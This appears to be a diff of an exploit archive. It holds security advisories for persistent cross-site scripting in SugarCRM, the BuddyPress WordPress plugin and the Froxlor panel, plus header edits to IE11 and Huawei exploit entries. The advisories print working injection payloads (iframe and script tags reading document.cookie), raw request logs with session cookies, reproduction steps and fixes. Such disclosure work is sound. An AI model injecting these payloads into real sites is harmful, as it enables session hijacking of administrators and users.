Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 1336
|
||||
Origin: https://sugar-crm.localhost:8000
|
||||
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
|
||||
Connection: keep-alive
|
||||
Referer: https://sugar-crm.localhost:8000/index.php
|
||||
|
||||
Cookie: p7token=677939c76f1b303862ac57ac3592a50e; checkCookie=1;
|
||||
PHPWMADMINSESSID=di26ub5h6fegtndktcu4qbkhc1;
|
||||
PHPSESSID=t1glh0rluv1cl7h0oh4i1nius4; sugar_user_theme=Sugar5;
|
||||
ck_login_id_20=1; ck_login_language_20=en_us;
|
||||
EmailGridWidths=0=10&1=10&2=150&3=250&4=175&5=125;
|
||||
EmailTreeLayout=42f3ef1b-3d1b-eac3-16a7-5eaeeeaae11c=false&
|
||||
713e7381-3309-2845-3c71-5eaeee59f0ca=false&be8b5121-f32c-13fd-cd9c-5eaeeec3b167=false&
|
||||
e3e40862-d8f3-77f0-f92e-5eaeee07eb24=false; Meetings_divs=history_v%3D%23
|
||||
-
|
||||
module=Contacts&record=45ab08a6-6ca8-fd0f-c4cb-5eaef0e0ef02&isDuplicate=false&action=Save&return_module=Contacts&
|
||||
return_action=DetailView&return_id=45ab08a6-6ca8-fd0f-c4cb-5eaef0e0ef02&module_tab=&contact_role=&relate_to=Contacts&
|
||||
relate_id=45ab08a6-6ca8-fd0f-c4cb5eaef0e0ef02&offset=1&opportunity_id=&case_id=&bug_id=&email_id=&inbound_email_id=&
|
||||
salutation=Mr.&first_name=nam23&last_name=e&phone_work=n&title=r&phone_mobile=h&department=t&phone_fax=k&account_name=&
|
||||
account_id=&primary_address_street=h&primary_address_city=z&
|
||||
primary_address_state=t<iframe src=evil.source
|
||||
onload=aler(document.cookie)>&primary_address_postalcode=b&
|
||||
primary_address_country=v&alt_address_street=h&alt_address_city=z&alt_address_state=t<iframe
|
||||
src=evil.source
|
||||
onload=alert(document.cookie)>&alt_address_postalcode=b&alt_address_country=v&alt_checkbox=on&Contacts_email_widget_id=0&
|
||||
emailAddressWidget=1&Contacts0emailAddress0=&Contacts0emailAddressId0=&
|
||||
Contacts0emailAddressPrimaryFlag=Contacts0emailAddress0&Contacts0emailAddressVerifiedFlag0=true&
|
||||
Contacts0emailAddressVerifiedValue0=&useEmailWidget=true&description=v<iframe
|
||||
src=a>&report_to_name=&
|
||||
reports_to_id=&sync_contact=0,1&lead_source=Web
|
||||
Site&do_not_call=0&campaign_name=&campaign_id=&
|
||||
assigned_user_name=h%20m&assigned_user_id=1
|
||||
-
|
||||
POST: HTTP/1.1 200 OK
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
Location:
|
||||
index.php?action=DetailView&module=Contacts&record=45ab08a6-6ca8-fd0f-c4cb-5eaef0e0ef02&offset=1
|
||||
Server: Microsoft-IIS/8.5
|
||||
Set-Cookie: ck_login_id_20=1; Max-Age=7776000; path=/;
|
||||
domain=sugar-crm.localhost:8000
|
||||
ck_login_language_20=en_us; Max-Age=7776000; path=/;
|
||||
domain=sugar-crm.localhost:8000
|
||||
sugar_user_theme=Sugar5; Max-Age=31536000
|
||||
X-Powered-By: ASP.NET
|
||||
Content-Length: 231
|
||||
|
||||
|
||||
https://sugar-crm.localhost:8000/index.php?module=Contacts&action=index
|
||||
https://sugar-crm.localhost:8000/index.php?module=Audit&action=Popup&query=true&record=45ab08a6-6ca8-fd0f-c4cb-5eaef0e0ef02&module_name=Contacts
|
||||
https://sugar-crm.localhost:8000/index.php?module=Import&action=Step1&import_module=Contacts&return_module=Contacts&return_action=index
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
The vulnerability can be patched following the next steps ...
|
||||
1. Restrict the input fields and disallow special chars for the main
|
||||
name values displayed in the list
|
||||
2. Escape the input transmitted from the alternate and primary inputs
|
||||
3. Parse and sanitize the ouput location to ensure its filtered securely
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The security risk of the persistent cross site web vulnerability in the
|
||||
sugarcrm web-application is estimated as medium.
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability-Lab -
|
||||
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
|
||||
Benjamin Kunz Mejri -
|
||||
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without
|
||||
any warranty. Vulnerability Lab disclaims all warranties,
|
||||
either expressed or implied, including the warranties of merchantability
|
||||
and capability for a particular purpose. Vulnerability-Lab
|
||||
or its suppliers are not liable in any case of damage, including direct,
|
||||
indirect, incidental, consequential loss of business profits
|
||||
or special damages, even if Vulnerability-Lab or its suppliers have been
|
||||
advised of the possibility of such damages. Some states do
|
||||
not allow the exclusion or limitation of liability for consequential or
|
||||
incidental damages so the foregoing limitation may not apply.
|
||||
We do not approve or encourage anybody to break any licenses, policies,
|
||||
deface websites, hack into databases or trade with stolen data.
|
||||
|
||||
Domains: www.vulnerability-lab.com www.vuln-lab.com
|
||||
www.vulnerability-db.com
|
||||
Services: magazine.vulnerability-lab.com
|
||||
paste.vulnerability-db.com infosec.vulnerability-db.com
|
||||
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
|
||||
youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php
|
||||
vulnerability-lab.com/rss/rss_upcoming.php
|
||||
vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php
|
||||
vulnerability-lab.com/register.php
|
||||
vulnerability-lab.com/list-of-bug-bounty-programs.php
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this
|
||||
file requires authorization from Vulnerability Laboratory.
|
||||
Permission to electronically redistribute this alert in its unmodified
|
||||
form is granted. All other rights, including the use of other
|
||||
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
|
||||
All pictures, texts, advisories, source code, videos and other
|
||||
information on this website is trademark of vulnerability-lab team & the
|
||||
specific authors or managers. To record, list, modify, use or
|
||||
edit our material contact (admin@ or research@) to get a ask permission.
|
||||
|
||||
Copyright © 2020 | Vulnerability Laboratory - [Evolution
|
||||
Security GmbH]™
|
||||
--
|
||||
VULNERABILITY LABORATORY - RESEARCH TEAM
|
||||
SERVICE: www.vulnerability-lab.com
|
292
exploits/php/webapps/49061.txt
Normal file
292
exploits/php/webapps/49061.txt
Normal file
|
@ -0,0 +1,292 @@
|
|||
# Exploit Title: WordPress Plugin Buddypress 6.2.0 - Persistent Cross-Site Scripting
|
||||
# Exploit Author: Vulnerability-Lab
|
||||
# Date: 2020-11-13
|
||||
# Vendor Homepage: https://wordpress.org/plugins/buddypress/
|
||||
# Version: 6.2.0
|
||||
|
||||
Document Title:
|
||||
===============
|
||||
Buddypress v6.2.0 WP Plugin - Persistent Web Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
https://www.vulnerability-lab.com/get_content.php?id=2263
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2020-11-13
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
2263
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
4.2
|
||||
|
||||
|
||||
Vulnerability Class:
|
||||
====================
|
||||
Cross Site Scripting - Persistent
|
||||
|
||||
|
||||
Current Estimated Price:
|
||||
========================
|
||||
500€ - 1.000€
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
Are you looking for modern, robust, and sophisticated social network
|
||||
software? BuddyPress is a suite of components that are common
|
||||
to a typical social network, and allows for great add-on features
|
||||
through WordPress’s extensive plugin system. Aimed at site builders
|
||||
& developers, BuddyPress is focused on ease of integration, ease of use,
|
||||
and extensibility. It is deliberately powerful yet unbelievably
|
||||
simple social network software, built by contributors to WordPress.
|
||||
|
||||
(Copy of the Homepage: https://wordpress.org/plugins/buddypress/ &
|
||||
https://buddypress.org/download/ )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The vulnerability laboratory core research team discovered a persistent
|
||||
xss web vulnerability in the Buddypress v6.2.0 plugin for wordpress.
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
Buddypress
|
||||
Product: Buddypress v6.0.0 - v6.2.0 (Wordpress Plugin)
|
||||
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2020-11-13: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
Medium
|
||||
|
||||
|
||||
Authentication Type:
|
||||
====================
|
||||
Restricted Authentication (Moderator Privileges)
|
||||
|
||||
|
||||
User Interaction:
|
||||
=================
|
||||
No User Interaction
|
||||
|
||||
|
||||
Disclosure Type:
|
||||
================
|
||||
Independent Security Research
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A persistent input validation web vulnerability has been discovered in
|
||||
the Buddypress v6.0.0 - v6.2.0 plugin for wordpress.
|
||||
The vulnerability allows remote attackers to inject own malicious script
|
||||
codes with persistent attack vector to compromise
|
||||
browser to web-application requests from the application-side.
|
||||
|
||||
The persistent vulnerability is located in the `wp:html` name parameter
|
||||
of the `figure` content. Remote attackers with privileges
|
||||
are able to inject own malicious persistent script code as input to
|
||||
compromise the internal ui of the wordpress backend. The attacker
|
||||
injects his code and in case the admin or other privileged user account
|
||||
previews the content the code simple executes. The request method
|
||||
to inject is POST and the attack vector is located on the application-side.
|
||||
|
||||
Successful exploitation of the vulnerabilities results in session
|
||||
hijacking, persistent phishing attacks, persistent external
|
||||
redirects to malicious source and persistent manipulation of affected
|
||||
application modules.
|
||||
|
||||
Request Method(s):
|
||||
[+] POST
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] wp:html
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] figure
|
||||
|
||||
Affected Module(s):
|
||||
[+] page_id=x&preview=true
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The persistent web vulnerability can be exploited by remote attackers
|
||||
with privilged user accounts without user interaction.
|
||||
For security demonstration or to reproduce the vulnerability follow the
|
||||
provided information and steps below to continue.
|
||||
|
||||
|
||||
PoC: Inject
|
||||
https://test23.localhost:8000/wp-admin/post.php?post=6&action=edit
|
||||
|
||||
|
||||
PoC: Execute
|
||||
https://test23.localhost:8000/?page_id=6
|
||||
https://test23.localhost:8000/?page_id=6&preview=true
|
||||
|
||||
|
||||
PoC: Vulnerable Source
|
||||
<div id="content" class="site-content">
|
||||
<div class="wrap">
|
||||
<div id="primary" class="content-area">
|
||||
<main id="main" class="site-main" role="main">
|
||||
<article id="post-6" class="post-6 page type-page status-draft hentry">
|
||||
<header class="entry-header">
|
||||
<h1 class="entry-title">Mitglieder</h1><span class="edit-link">
|
||||
<a class="post-edit-link"
|
||||
href="https://test23.localhost:8000/wp-admin/post.php?post=6&action=edit">
|
||||
<span class="screen-reader-text">„Mitglieder“</span>
|
||||
bearbeiten</a></span> </header><!-- .entry-header -->
|
||||
<div class="entry-content">
|
||||
<p></p>
|
||||
<div class="wp-block-group"><div class="wp-block-group__inner-container">
|
||||
<div class="wp-block-group"><div
|
||||
class="wp-block-group__inner-container"></div></div>
|
||||
</div></div>
|
||||
<figure><iframe src="evil.source"
|
||||
onload="alert(document.cookie)"></iframe></figure>
|
||||
</div><!-- .entry-content -->
|
||||
</article><!-- #post-6 -->
|
||||
</main><!-- #main -->
|
||||
</div><!-- #primary -->
|
||||
</div><!-- .wrap -->
|
||||
</div>
|
||||
|
||||
|
||||
--- PoC Session Logs (POST) ---
|
||||
https://test23.localhost:8000/index.php?rest_route=%2Fwp%2Fv2%2Fpages%2F6&_locale=user
|
||||
Host: test23.localhost:8000
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0)
|
||||
Gecko/20100101 Firefox/76.0
|
||||
Accept: application/json, */*;q=0.1
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Referer: https://test23.localhost:8000/wp-admin/post.php?post=6&action=edit
|
||||
X-WP-Nonce: 04a953e188
|
||||
X-HTTP-Method-Override: PUT
|
||||
Content-Type: application/json
|
||||
Origin: https://test23.localhost:8000
|
||||
Content-Length: 614
|
||||
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
|
||||
Connection: keep-alive
|
||||
Cookie:
|
||||
g3sid=bdbf56f2335bbce0720f03ed25343b66db61b54a%7E6a5nrndvh14i5kb09tfrl7afe2;
|
||||
wordpress_test_cookie=WP+Cookie+check;
|
||||
wordpress_logged_in_55a3fb1cb724d159a111224c7f110400=admin_f507c7w4%7C1589912472%7CxTSn77nlwpdxYR8NUaJOXfQM9ShaBlSLzP7Anix
|
||||
xNt8%7C557ca2874863d9f1f6a8316659798e11558a01ffc8671eea68d496aa5df99b17;
|
||||
wp-settings-time-1=1589740723
|
||||
{"id":6,"content":"<!-- wp:paragraph -->n<p></p>n<!-- /wp:paragraph
|
||||
-->nn<!-- wp:group -->n<div class="wp-block-group">
|
||||
<div class="wp-block-group__inner-container"><!-- wp:group -->n<div
|
||||
class="wp-block-group"><div class="wp-block-group__inner-container">
|
||||
<!-- wp:block {"ref":"reusable1"} /--></div></div>n<!-- /wp:group
|
||||
--></div></div>n<!-- /wp:group -->nn
|
||||
<!-- wp:block {"ref":"reusable1"} /-->nn<!-- wp:block
|
||||
{"ref":"reusable1"} /-->nn
|
||||
<!-- wp:html -->n<figure><iframe src="evil.source"
|
||||
onload="alert(document.cookie)"></iframe></figure>n<!-- /wp:html
|
||||
-->nn<!-- wp:bp/member /-->"}
|
||||
-
|
||||
POST: HTTP/1.1 200 OK
|
||||
Cache-Control: no-cache, must-revalidate, max-age=0
|
||||
Allow: GET, POST, PUT, PATCH, DELETE
|
||||
Content-Type: application/json; charset=UTF-8
|
||||
Vary: Origin
|
||||
Server: Microsoft-IIS/8.5
|
||||
X-Robots-Tag: noindex
|
||||
Link: <https://test23.localhost:8000/index.php?rest_route=/>;
|
||||
rel="https://api.w.org/"
|
||||
Content-Length: 3108
|
||||
|
||||
|
||||
References:
|
||||
https://test23.localhost:8000/index.php
|
||||
https://test23.localhost:8000/wp-admin/post.php
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The security risk of the persistent input validation web vulnerability
|
||||
in the web-application is estimated as medium.
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability-Lab [Research Team] -
|
||||
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without
|
||||
any warranty. Vulnerability Lab disclaims all warranties,
|
||||
either expressed or implied, including the warranties of merchantability
|
||||
and capability for a particular purpose. Vulnerability-Lab
|
||||
or its suppliers are not liable in any case of damage, including direct,
|
||||
indirect, incidental, consequential loss of business profits
|
||||
or special damages, even if Vulnerability-Lab or its suppliers have been
|
||||
advised of the possibility of such damages. Some states do
|
||||
not allow the exclusion or limitation of liability for consequential or
|
||||
incidental damages so the foregoing limitation may not apply.
|
||||
We do not approve or encourage anybody to break any licenses, policies,
|
||||
deface websites, hack into databases or trade with stolen data.
|
||||
|
||||
Domains: www.vulnerability-lab.com www.vuln-lab.com
|
||||
www.vulnerability-db.com
|
||||
Services: magazine.vulnerability-lab.com
|
||||
paste.vulnerability-db.com infosec.vulnerability-db.com
|
||||
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
|
||||
youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php
|
||||
vulnerability-lab.com/rss/rss_upcoming.php
|
||||
vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php
|
||||
vulnerability-lab.com/register.php
|
||||
vulnerability-lab.com/list-of-bug-bounty-programs.php
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this
|
||||
file requires authorization from Vulnerability Laboratory.
|
||||
Permission to electronically redistribute this alert in its unmodified
|
||||
form is granted. All other rights, including the use of other
|
||||
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
|
||||
All pictures, texts, advisories, source code, videos and other
|
||||
information on this website is trademark of vulnerability-lab team & the
|
||||
specific authors or managers. To record, list, modify, use or
|
||||
edit our material contact (admin@ or research@) to get a ask permission.
|
||||
|
||||
Copyright © 2020 | Vulnerability Laboratory - [Evolution
|
||||
Security GmbH]™
|
||||
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY - RESEARCH TEAM
|
||||
SERVICE: www.vulnerability-lab.com
|
301
exploits/php/webapps/49063.txt
Normal file
301
exploits/php/webapps/49063.txt
Normal file
|
@ -0,0 +1,301 @@
|
|||
# Exploit Title: Froxlor Froxlor Server Management Panel 0.10.16 - Persistent Cross-Site Scripting
|
||||
# Exploit Author: Vulnerability-Lab
|
||||
# Date: 2020-11-12
|
||||
# Vendor Homepage: https://froxlor.org/
|
||||
# Software Link: https://froxlor.org/download/
|
||||
# Version: 0.10.16
|
||||
|
||||
Document Title:
|
||||
===============
|
||||
Froxlor v0.10.16 CP - (Customer) Persistent Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
https://www.vulnerability-lab.com/get_content.php?id=2241
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2020-11-12
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
2241
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
5.2
|
||||
|
||||
|
||||
Vulnerability Class:
|
||||
====================
|
||||
Cross Site Scripting - Persistent
|
||||
|
||||
|
||||
Current Estimated Price:
|
||||
========================
|
||||
1.000€ - 2.000€
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
Froxlor Server Management Panel, the lightweight server management
|
||||
software for your needs. Developed by experienced server
|
||||
administrators, this open source (GPL) panel simplifies the effort of
|
||||
managing your hosting. Manage reseller ressources and
|
||||
limit what the customers may use in the dedicated customerpanel. MySQL
|
||||
management, Directory protection & settings management.
|
||||
|
||||
(Copy of the Homepage: https://froxlor.org/index.php &
|
||||
https://froxlor.org/download/ )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The vulnerability laboratory core research team discovered a persistent
|
||||
cross site vulnerability in the Froxlor Server Management Panel v0.10.16.
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
Froxlor Team
|
||||
Product: Froxlor v0.10.16 (Stable) - Server Management Panel (Control Panel)
|
||||
Affected Packages: Gentoo, Debian & Ubuntu
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2020-05-01: Researcher Notification & Coordination (Security Researcher)
|
||||
2020-05-02: Vendor Notification (Security Department)
|
||||
2020-05-13: Vendor Response/Feedback (Security Department)
|
||||
2020-10-12: Vendor Fix/Patch (Service Developer Team)
|
||||
****-**-**: Security Acknowledgements (Security Department)
|
||||
2020-11-12: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
Medium
|
||||
|
||||
|
||||
Authentication Type:
|
||||
====================
|
||||
Restricted Authentication (Guest Privileges)
|
||||
|
||||
|
||||
User Interaction:
|
||||
=================
|
||||
Low User Interaction
|
||||
|
||||
|
||||
Disclosure Type:
|
||||
================
|
||||
Full Disclosure
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A persistent input validation web vulnerability has been discovered in
|
||||
the Froxlor Server Management Panel v0.10.16 web-application.
|
||||
The vulnerability allows remote attackers to inject own malicious script
|
||||
codes with persistent attack vector to compromise browser
|
||||
to web-application requests from the application-side.
|
||||
|
||||
The persistent cross site web vulnerability is located in the
|
||||
`username`, `name` and `firstname` input fields of the customer
|
||||
add or registration module. Remote attackers are able to add customers
|
||||
with malicious script code as firstname or name to
|
||||
manipulate in the backend the `admin_customers.php` and `customers.php`
|
||||
files. The injection point is the registration
|
||||
or customer add/edit module and the execution occurs on preview of the
|
||||
traffic module in the admin backend. The request
|
||||
method to inject is POST and the attack vector is persistent located on
|
||||
the application-side. In a valid attack case the
|
||||
remote attacker uses a customer or reseller account to inject the
|
||||
payload as name to provoke an execute in the insecure
|
||||
backend module.
|
||||
|
||||
Successful exploitation of the vulnerability results in session
|
||||
hijacking, persistent phishing attacks, persistent external
|
||||
redirects to malicious source and persistent manipulation of affected
|
||||
application modules.
|
||||
|
||||
Request Method(s):
|
||||
[+] POST
|
||||
|
||||
Vulnerable Input(s):
|
||||
[+] Username
|
||||
[+] Name
|
||||
[+] Firstname
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] Customers
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] name
|
||||
[+] firstname
|
||||
|
||||
Affected File(s):
|
||||
[+] admin_customers.php
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The persistent input validation vulnerability can be exploited by remote
|
||||
attackers with low privilege user account and with low user interaction.
|
||||
For security demonstration or to reproduce the security web
|
||||
vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
|
||||
Manual steps to reproduce the vulnerability ...
|
||||
1. Register or login with a low privilege user account
|
||||
2. Open the profile account section
|
||||
3. Change the name and firstname or include in the registration process
|
||||
Note: Inject test payload to vulnerable marked input fields
|
||||
4. Save or submit the input via form
|
||||
5. Wait until an admin or higher privileged user role opens the traffic
|
||||
stats to execute
|
||||
6. Successful reproduce of the persistent input validation web
|
||||
vulnerability!
|
||||
|
||||
|
||||
PoC: Payload (Exploitation)
|
||||
test%20>"<script alert(document.cookie)></script>div style=1
|
||||
|
||||
|
||||
PoC: Vulnerable Sources (Execution Points) [admin_customers.php or
|
||||
customers.php to admin_traffic.php via Name & Firstname]
|
||||
<tr role="row">
|
||||
<td>>">test%20>"<script alert(document.cookie)></script>div
|
||||
style=1[MALICIOUS SCRIPT CODE EXECUTION POINT!]
|
||||
<a
|
||||
href="admin_customers.php?s=9e20410f4871894db51f11258d5c4b3b&target=traffic&page=customers&action=su&id=2"
|
||||
|
||||
rel="external" target="_blank">[Details]</a></td>
|
||||
<td><small>-</small></td>
|
||||
</tr><tr role="row">
|
||||
|
||||
|
||||
--- PoC Session Logs [POST] --- (Reseller Account to Admin)
|
||||
https://froxlor.localhost:8080/admin_customers.php?s=e3b54c0284e4beca6fd06fed6c86ee20
|
||||
Host: froxlor.localhost:8080
|
||||
Accept:
|
||||
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 879
|
||||
Origin: https://froxlor.localhost:8080
|
||||
Connection: keep-alive
|
||||
Referer:
|
||||
https://froxlor.localhost:8080/admin_customers.php?s=e3b54c0284e4beca6fd06fed6c86ee20&page=customers&action=add
|
||||
Cookie: PHPSESSID=c34ist63ukv1vq9vt5m1hfumpo
|
||||
s=e3b54c0284e4beca6fd06fed6c86ee20&page=customers&action=add&send=send&
|
||||
new_loginname=test1%20>"<script alert(document.cookie)></script>div
|
||||
style=1&createstdsubdomain=0,1&
|
||||
store_defaultindex=0,1&new_customer_password=KwhyqgzvPo&
|
||||
new_customer_password_suggestion=KwhyqgzvPo&sendpassword=0,1&def_language=English&api_allowed=0,1&
|
||||
name=btest%20>"<script alert(document.cookie)></script>div style=1&
|
||||
firstname=ctest%20>"<script alert(document.cookie)></script>div
|
||||
style=1&gender=0&
|
||||
company=&street=&zipcode=&city=&phone=&fax=&email=trest@aol.de&customernumber=&
|
||||
custom_notes=&custom_notes_show=0&diskspace=0&traffic=0&subdomains=0&emails=0&email_accounts=0&
|
||||
email_forwarders=0&email_imap=0,1&email_pop3=0,1&ftps=0&mysqls=0&phpenabled=0,1&allowed_phpconfigs[]=1&
|
||||
perlenabled=0&dnsenabled=0&logviewenabled=0
|
||||
-
|
||||
POST: HTTP/2.0 200 OK
|
||||
server: Apache
|
||||
vary: Accept-Encoding
|
||||
content-encoding: gzip
|
||||
content-length: 1393
|
||||
content-type: text/html; charset=UTF-8
|
||||
|
||||
|
||||
Reference(s):
|
||||
https://froxlor.localhost:8080/
|
||||
https://froxlor.localhost:8080/admin_traffic.php
|
||||
https://froxlor.localhost:8080/admin_traffic.php?s=[x]&page=customers
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
The vulnerability can be patched by follwing the next steps ...
|
||||
1. Validate and escape the content of the vulnerable username, name and
|
||||
firstname input fields
|
||||
2. Restrict the input fields and disallow specialchars on inputs to filter
|
||||
3. Parse the two output location and escape or secure encode the content
|
||||
4. Encode in the edit formular the results on check
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The security risk of the persistent validation web vulnerability in the
|
||||
web-application is estimated as medium.
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability-Lab -
|
||||
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
|
||||
Benjamin Kunz Mejri -
|
||||
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without
|
||||
any warranty. Vulnerability Lab disclaims all warranties,
|
||||
either expressed or implied, including the warranties of merchantability
|
||||
and capability for a particular purpose. Vulnerability-Lab
|
||||
or its suppliers are not liable in any case of damage, including direct,
|
||||
indirect, incidental, consequential loss of business profits
|
||||
or special damages, even if Vulnerability-Lab or its suppliers have been
|
||||
advised of the possibility of such damages. Some states do
|
||||
not allow the exclusion or limitation of liability for consequential or
|
||||
incidental damages so the foregoing limitation may not apply.
|
||||
We do not approve or encourage anybody to break any licenses, policies,
|
||||
deface websites, hack into databases or trade with stolen data.
|
||||
|
||||
Domains: www.vulnerability-lab.com www.vuln-lab.com
|
||||
www.vulnerability-db.com
|
||||
Services: magazine.vulnerability-lab.com
|
||||
paste.vulnerability-db.com infosec.vulnerability-db.com
|
||||
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
|
||||
youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php
|
||||
vulnerability-lab.com/rss/rss_upcoming.php
|
||||
vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php
|
||||
vulnerability-lab.com/register.php
|
||||
vulnerability-lab.com/list-of-bug-bounty-programs.php
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this
|
||||
file requires authorization from Vulnerability Laboratory.
|
||||
Permission to electronically redistribute this alert in its unmodified
|
||||
form is granted. All other rights, including the use of other
|
||||
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
|
||||
All pictures, texts, advisories, source code, videos and other
|
||||
information on this website is trademark of vulnerability-lab team & the
|
||||
specific authors or managers. To record, list, modify, use or
|
||||
edit our material contact (admin@ or research@) to get a ask permission.
|
||||
|
||||
Copyright © 2020 | Vulnerability Laboratory - [Evolution
|
||||
Security GmbH]™
|
||||
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY - RESEARCH TEAM
|
||||
SERVICE: www.vulnerability-lab.com
|
|
@ -1,12 +1,11 @@
|
|||
# Exploit Title: Internet Explorer 11 - Use-After-Free
|
||||
# Google Dork: if applicable
|
||||
# Date: 2020-09-06
|
||||
# Exploit Author: Tgroup
|
||||
# Vendor Homepage: Microsoft.com
|
||||
# Version: IE 11 (REQUIRED)
|
||||
# Tested on: Windows 7 x64
|
||||
# Exploit Title: Microsoft Internet Explorer 11 - Use-After-Free
|
||||
# Date: 2020-05-07
|
||||
# Exploit Author: maxpl0it
|
||||
# Vendor Homepage: https://www.microsoft.com/
|
||||
# Software Link: https://www.microsoft.com/en-gb/download/internet-explorer.aspx
|
||||
# Version: IE 8, 9, 10, and 11
|
||||
# Tested on: Windows 7 (x64)
|
||||
# CVE : CVE-2020-0674
|
||||
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
|
@ -15,7 +14,7 @@
|
|||
// -------------------------------------------------------------------------------------------------
|
||||
//
|
||||
// Credits:
|
||||
// Tgroup () - Writing the exploit
|
||||
// maxpl0it (@maxpl0it) - Writing the exploit
|
||||
// Qihoo 360 - Identifying the vulnerability in the wild
|
||||
//
|
||||
//
|
||||
|
@ -38,7 +37,8 @@
|
|||
// 11 (Either the TabProcGrowth registry key set or Enhanced Protected Mode enabled to use x64)
|
||||
//
|
||||
// Further notes:
|
||||
//
|
||||
// Video at https://twitter.com/maxpl0it/status/1253396942048104448
|
||||
//
|
||||
// The debug is better viewed in the console. Open Developer Tools and enable debug below.
|
||||
//
|
||||
// This is the non-EMET-bypassing version and only handles the stack pivot check and EAF.
|
34
exploits/windows/local/49066.txt
Normal file
34
exploits/windows/local/49066.txt
Normal file
|
@ -0,0 +1,34 @@
|
|||
# Exploit Title: Huawei LCD_Service 1.0.1.0 - 'LCD_Service' Unquote Service Path
|
||||
# Date: 2020-11-07
|
||||
# Exploit Author: Gerardo González
|
||||
# Vendor Homepage: https://consumer.huawei.com/mx
|
||||
# Software Link: https://consumer.huawei.com/mx
|
||||
# Version: 1.0.1.0
|
